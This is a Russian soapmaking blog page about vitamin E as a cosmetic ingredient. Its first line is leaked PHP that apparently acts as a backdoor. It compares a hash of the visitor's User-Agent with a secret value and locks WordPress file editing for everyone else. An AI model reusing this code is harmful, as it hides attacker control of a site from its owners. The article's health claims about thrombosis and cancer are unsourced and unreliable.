if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Витамин Е (токоферол) | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Витамин Е (токоферол)

Витамин Е (токоферол) относится к группе жирорастворимых биологически активных веществ, содержится в основном в продуктах с высокой концентрацией жира

ингредиенты для мыла - Витамин Е (токоферол) ингредиенты для мыла - Витамин Е (токоферол)

Вита­мин Е (токо­фе­рол) отно­сит­ся к груп­пе жиро­рас­тво­ри­мых био­ло­ги­че­ски актив­ных веществ, содер­жит­ся в основ­ном в про­дук­тах с высо­кой кон­цен­тра­ци­ей жира.

Свой­ства

Попу­ляр­ность вита­ми­на Е обу­слов­ле­на его анти­ок­си­дант­ны­ми свой­ства­ми. Как ни один дру­гой вита­мин, он замед­ля­ет про­цес­сы ста­ре­ния, спо­соб­ству­ет пита­нию кле­ток и укреп­ле­нию сте­нок сосу­дов, а это чрез­вы­чай­но важ­но для предот­вра­ще­ния угро­зы воз­ник­но­ве­ния тром­бо­за. Анти­ок­си­дант­ные свой­ства вита­ми­на Е уве­ли­чи­ва­ют­ся в соче­та­нии с дру­ги­ми пита­тель­ны­ми веще­ства­ми, осо­бен­но это каса­ет­ся его ком­би­на­ции с вита­ми­ном С, кото­рая актив­но при­ме­ня­ет­ся для акти­ви­за­ции про­ти­во­ра­ко­вых защит­ных свойств.

Осо­бо­го вни­ма­ния заслу­жи­ва­ют кос­ме­то­ло­ги­че­ские свой­ства вита­ми­на Е. Мало того, что он увлаж­ня­ет кожу, улуч­ша­ет струк­ту­ру ног­тей и волос, вос­ста­нав­ли­ва­ет тка­ни кож­но­го покро­ва, умень­ша­ет риск обра­зо­ва­ния шра­мов, явля­ет­ся неза­ме­ни­мым сред­ством для борь­бы с купе­ро­зом и «сеточ­кой», так он еще и по пра­ву счи­та­ет­ся «вита­ми­ном моло­до­сти». Вита­мин Е пре­крас­но защи­ща­ет клет­ки от повре­жде­ний, замед­ля­ет окис­ле­ние липи­дов, предот­вра­ща­ет стар­че­скую пиг­мен­та­цию и спо­соб­ству­ет напол­не­нию кле­ток кислородом.

При­ме­не­ние

Вита­мин Е — ком­по­нент номер 1 про­дук­ции кос­ме­то­ло­гии, исполь­зу­ет­ся прак­ти­че­ски во всех лини­ях и груп­пах това­ров: мыло руч­ной рабо­ты, кре­ма, лосьо­ны, тони­ки, шам­пу­ни и т.д. Осо­бую попу­ляр­ность име­ют мас­ки для кожи лица и волос домаш­не­го при­го­тов­ле­ния с содер­жа­ни­ем дан­но­го продукта.

Бла­го­да­ря сво­им уди­ви­тель­ным свой­ствам, вита­мин Е явля­ет­ся актив­ным ком­по­нен­том мно­гих поли­ви­та­ми­нов и БАДов к пище.

Может вызы­вать аллер­ги­че­ские реак­ции при чрез­мер­ном потреб­ле­нии, поэто­му необ­хо­ди­мо чет­ко соблю­дать дозировку.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!